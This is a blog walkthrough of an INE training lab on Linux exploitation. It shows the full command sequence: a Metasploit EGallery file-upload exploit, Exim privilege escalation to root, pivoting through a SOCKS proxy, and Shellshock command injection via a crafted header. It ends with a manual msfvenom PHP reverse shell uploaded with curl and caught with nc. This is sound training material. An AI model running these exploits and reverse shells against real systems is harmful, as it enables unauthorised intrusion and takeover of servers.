June 19, 2022 | 21:00

INE Lab - Linux Remote Exploitation and Post Exploitation

The scenario is described as follows:

In this lab environment, the user will access a Kali GUI instance. A vulnerable application can be accessed using the tools installed on Kali at http://demo.ine.local

Objective: Exploit both the target and find all flags!


First, let’s see if we can find the IP address of our first target in the hosts file:

root@INE:~# cat /etc/hosts | grep ine.local demo.ine.local

Next, we take note that the eth1 interface is the route to the target:

root@INE:~# route -n
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface         UG    0      0        0 eth0     U     0      0        0 eth0   U     0      0        0 eth1

Our IP for interface eth1 is

root@INE:~# ifconfig eth1 | grep "inet"
        inet  netmask  broadcast

Scanning the host reveals an Exim SMTP server version 4.89 on port 25 and an Apache web server version 2.4.7 on port 80. Furthermore, the target is an Ubuntu machine.

root@INE:~# nmap -vv -p- -T4 demo.ine.local
25/tcp open  smtp    syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
root@INE:~# nmap -sV -p25,80 -sV demo.ine.local
25/tcp open  smtp    Exim smtpd 4.89
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))

When browsing to the website, we are greeted with a PHP image gallery web application called EGallery:


Searching for exploits, we only see one of relevance, which is a ready-to-use Metasploit module:

root@INE:~# searchsploit egallery | grep EGallery
EGallery - Arbitrary '.PHP' File Upload (Metasploit)          | php/webapps/20029.rb

The exploit works and leads to an unprivileged Meterpreter session as the www-data user:

msf6 > use exploit/unix/webapp/egallery_upload_exec
msf6 exploit(unix/webapp/egallery_upload_exec) > set rhosts demo.ine.local
msf6 exploit(unix/webapp/egallery_upload_exec) > set targeturi /
msf6 exploit(unix/webapp/egallery_upload_exec) > set lhost eth1
msf6 exploit(unix/webapp/egallery_upload_exec) > exploit
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : demo.ine.local
OS          : Linux demo.ine.local 5.4.0-121-generic #137-Ubuntu SMP Sun Jun 19 13:33:07 UTC 2022 x86_64
Meterpreter : php/linux

We find a first flag:

meterpreter > cat THIS_IS_FLAG5234234324/FLAG1

From our initial nmap scan, we remember that the target also runs an Exim 4.89 service. Searchsploit shows a privilege escalation exploit that might work:

root@INE:~# searchsploit exim privilege escalation
Exim 4.87 - 4.91 - Local Privilege Escalation                | linux/local/46996.sh
Exim 4.87 / 4.91 - Local Privilege Escalation (Metasploit)   | linux/local/47307.rb

The exploit works when using a stageless payload and we have successfully escalated our privileges to root:

msf6 > use exploit/linux/local/exim4_deliver_message_priv_esc
msf6 exploit(linux/local/exim4_deliver_message_priv_esc) > set session 1
msf6 exploit(linux/local/exim4_deliver_message_priv_esc) > set lhost eth1
msf6 exploit(linux/local/exim4_deliver_message_priv_esc) > set payload linux/x64/meterpreter_reverse_tcp
msf6 exploit(linux/local/exim4_deliver_message_priv_esc) > exploit
meterpreter > getuid
Server username: root

And we find a second flag:

meterpreter > cat /root/FLAG2


Besides the IP that we saw within our hosts file, the host demo.ine.local has a second interface:

meterpreter > shell
ifconfig eth1 | grep inet
          inet addr:  Bcast:  Mask:

And the corresponding subnet is

Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
default         linux          UG    0      0        0 eth0    *        U     0      0        0 eth0   *        U     0      0        0 eth1

Let’s add a route to that subnet:

meterpreter > run autoroute -s

We then proceed with a TCP scan of the hosts on that subnet and discover two new hosts with IP addresses and

msf6 exploit(linux/local/exim4_deliver_message_priv_esc) > use auxiliary/scanner/portscan/tcp 
msf6 auxiliary(scanner/portscan/tcp) > set rhosts
msf6 auxiliary(scanner/portscan/tcp) > set ports 1-1000
msf6 auxiliary(scanner/portscan/tcp) > set threads 100
msf6 auxiliary(scanner/portscan/tcp) > run

[+]        - - TCP OPEN
[+]        - - TCP OPEN
[+]        - - TCP OPEN
[+]        - - TCP OPEN

The host has port 80 open, so we use a SOCKS proxy to access it.

msf6 auxiliary(scanner/portscan/tcp) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set srvhost
msf6 auxiliary(server/socks_proxy) > set srvport 1080
msf6 auxiliary(server/socks_proxy) > run

In another terminal, we modify the proxychains configuration to match Metasploit’s SOCKS proxy and start a browser:

root@INE:~# sudo sed -i "s/socks4.*/socks5 1080/g" /etc/proxychains4.conf

There is an Apache server running and we now know the name of that second target, which is demo2.ine.local:

root@INE:~# proxychains nmap -Pn -sT -p80 -sV
80/tcp open  http    Apache httpd 2.2.22
Service Info: Host: demo2.ine.local

Let’s try to look at the web application:

root@INE:~# proxychains firefox

We can see a web application called AttackDefense and it embeds an iframe from the path /cgi-bin/stats:


The CGI program is vulnerable to Shellshock:

root@INE:~# proxychains nmap -Pn -sT -p80 --script http-shellshock --script-args uri=/cgi-bin/stats
80/tcp open  http
| http-shellshock: 
|   HTTP Shellshock vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-6271
|       This web application might be affected by the vulnerability known
|       as Shellshock. It seems the server is executing commands injected
|       via malicious HTTP headers.

We can send our own commands:

root@INE:~# proxychains wget -U "() { foo;};echo \"Cotent-type: text/plain\"; echo; echo; /usr/bin/id" && cat stats && rm stats
uid=33(www-data) gid=33(www-data) groups=33(www-data)
root@INE:~# proxychains wget -U "() { foo;};echo \"Cotent-type: text/plain\"; echo; echo; /bin/uname -a" && cat stats && rm stats
Linux demo2.ine.local 5.4.0-121-generic #137-Ubuntu SMP Sun Jun 19 13:33:07 UTC 2022 x86_64 GNU/Linux

The relevant Metasploit module is exploit/multi/http/apache_mod_cgi_bash_env_exec. We use a bind shell, because our attacker machine is not accessible from the target.

msf6 auxiliary(server/socks_proxy) > use exploit/multi/http/apache_mod_cgi_bash_env_exec
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set rhosts
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set targeturi /cgi-bin/stats
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set target Linux x86_64
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set payload linux/x64/meterpreter/bind_tcp
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > exploit
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer     : demo2.ine.local
OS           : Debian 7.11 (Linux 5.4.0-121-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux


Manual Exploitation of EGallery

I wanted to know, if there’s also an easy way to manually exploit the EGallery vulnerability. I proxied the Metasploit through Burp with the following options:

msf6 exploit(unix/webapp/egallery_upload_exec) > set PROXIES HTTP:
msf6 exploit(unix/webapp/egallery_upload_exec) > set ReverseAllowProxy true

The requests look like a simple upload of a PHP reverse shell and it’s subsequent call:

“Burped request”

We create a PHP reverse shell and prepend <?php to have a valid PHP webpage:

root@INE:~# msfvenom -p php/reverse_php LHOST= LPORT=5555 -f raw > shell.php
root@INE:~# echo "<?php" | cat - shell.php > /tmp/out && mv /tmp/out shell.php

Now we upload our PHP file:

curl -F "Filedata=@./shell.php" demo.ine.local/egallery/uploadify.php

Let’s start a listener:

root@INE:~# nc -nlvp 5555
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on

And as soon as we browse to http://demo.ine.local/shell.php, we’ll get the reverse connection:

Ncat: Connection from
Ncat: Connection from
uid=33(www-data) gid=33(www-data) groups=33(www-data)

© Pavel Pi 2021

Powered by Hugo & Kiss'Em.